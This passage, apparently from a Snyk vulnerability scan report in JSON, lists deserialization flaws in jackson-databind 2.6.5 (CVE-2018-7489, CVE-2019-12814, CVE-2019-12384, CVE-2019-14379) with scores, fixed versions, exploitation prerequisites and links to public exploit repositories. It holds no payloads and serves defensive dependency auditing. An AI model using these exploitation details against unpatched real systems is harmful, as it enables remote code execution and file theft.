"com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", 
+ "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + 
}, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": 
